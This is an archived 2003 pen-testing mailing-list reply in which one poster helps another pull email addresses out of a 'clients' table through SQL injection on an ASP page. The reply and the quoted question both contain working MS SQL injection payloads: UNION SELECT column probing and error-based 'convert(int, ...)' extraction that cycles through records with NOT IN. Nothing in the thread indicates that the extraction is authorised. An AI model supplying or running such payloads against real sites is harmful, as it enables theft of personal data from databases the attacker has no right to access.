RE: SQL injection - get more values

From: Panos Dimitriou (p.dimitriou@encode-sec.com)
Date: Wed Feb 12 2003 - 10:51:16 PST

Next message: Thaidn: "Re: SQL injection - get more values"

Previous message: Rob Shein: "RE: Vulnebrability level definition"
In reply to: Daniel Savi: "SQL injection - get more values"
Next in thread: Cesar: "RE: SQL injection - get more values"
Next in thread: Thaidn: "Re: SQL injection - get more values"
Reply: Cesar: "RE: SQL injection - get more values"
Reply: Thaidn: "Re: SQL injection - get more values"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

One solution is to try to find the exact columns to perform a union
select by replacing 1s with 'foo' when you get the error message "
operand type clash: text is incompatible with int"

Example:

') union all select sum(email),1,1,1.... from clients--
until you get: operand type clash: text is incompatible with int Then
change the last 1 with 'foo' and continue with 1s, and so on and so
forth.

The other solution is to try to get all the data through error cycling,
as you already tried and use NOT IN as follows:

' %2b convert(int, (SELECT max(email) FROM clients WHERE email not in
('anonat_private','othermailat_private',...))) %2b '
 
I hope this works

Panos Dimitriou
Director, MSS


-----Original Message-----
From: Daniel Savi [mailto:dssat_private] 
Sent: Wednesday, February 12, 2003 7:49 PM
To: pen-testat_private
Subject: SQL injection - get more values



Hi :)

i'm trying to get some info from clients table and email field....

i try this param into gubpage.asp?=...
') union select sum(email) from clients--
and got error about all queries needed...so, i tryed to solve with
') union select sum(email),1,1,1.... from clients--
until i get: operand type clash: text is incompatible with int 

i found this answer into this forum (thanks :)), was:
' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '

i got this: 
Syntax error converting the varchar value 'anonat_private' to a column of 
data type int

Now, my problem: How can i get other e-mail from table knowing one valid

value?

i try this
' %2b convert(int, (SELECT email FROM clients WHERE email 
> 'anonat_private')) %2b '
but no success

i think i can use NOT iN, but not sure how to use with convert...

Any tip are welcome!

Thanks

------------------------------------------------------------------------
----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Thaidn: "Re: SQL injection - get more values"
Previous message: Rob Shein: "RE: Vulnebrability level definition"
In reply to: Daniel Savi: "SQL injection - get more values"
Next in thread: Cesar: "RE: SQL injection - get more values"
Next in thread: Thaidn: "Re: SQL injection - get more values"
Reply: Cesar: "RE: SQL injection - get more values"
Reply: Thaidn: "Re: SQL injection - get more values"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Feb 12 2003 - 13:24:28 PST